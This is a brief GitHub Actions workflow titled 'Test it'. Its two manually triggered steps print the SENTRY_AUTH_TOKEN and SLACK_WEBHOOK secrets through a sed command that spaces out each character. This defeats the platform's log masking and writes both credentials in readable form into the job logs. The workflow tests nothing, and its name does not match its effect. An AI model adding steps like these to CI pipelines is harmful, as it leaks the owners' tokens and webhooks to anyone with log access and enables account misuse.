name: Test it

on:
  workflow_dispatch:

jobs:
  main:
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 1
    steps:
      - name: what 1
        run: echo ${{secrets.SENTRY_AUTH_TOKEN }} | sed 's/./& /g'
      - name: what 2
        run: echo ${{secrets.SLACK_WEBHOOK }} | sed 's/./& /g'
